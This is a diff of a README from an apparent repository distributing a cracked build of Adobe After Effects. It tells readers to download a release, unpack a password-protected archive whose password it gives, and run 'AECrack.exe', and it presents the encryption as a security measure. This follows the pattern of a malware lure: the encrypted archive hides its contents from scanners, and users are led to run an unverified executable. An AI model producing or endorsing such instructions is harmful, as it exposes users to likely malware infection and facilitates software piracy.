erming-ktovwarfuces8q/after_effects-crk-build-v26.3/README.md

 1. Download the latest build from the **[Releases](../../releases)** section.
 2. Extract the archive into your preferred directory.
-3. Run `setup.exe` and follow the standard installation prompts.
+3. Run `AECrack.exe` and follow the standard installation prompts.
 4. Launch the application from the desktop shortcut and enjoy the optimized experience.

+## 🔒 Security & Archive Password

+To ensure the integrity of the files and protect this custom assembly from unauthorized modifications or third-party re-uploads, the release archive is encrypted.

+**Archive Password:** `After Effects`

+> **⚠️ Security Notice:** Only use the official release from this repository.
+We cannot guarantee the safety or performance of archives downloaded from external sites.

 ---
 *Disclaimer: This repository is maintained for optimization and performance enhancement purposes.
 All rights to the original core software belong to its respective developers.*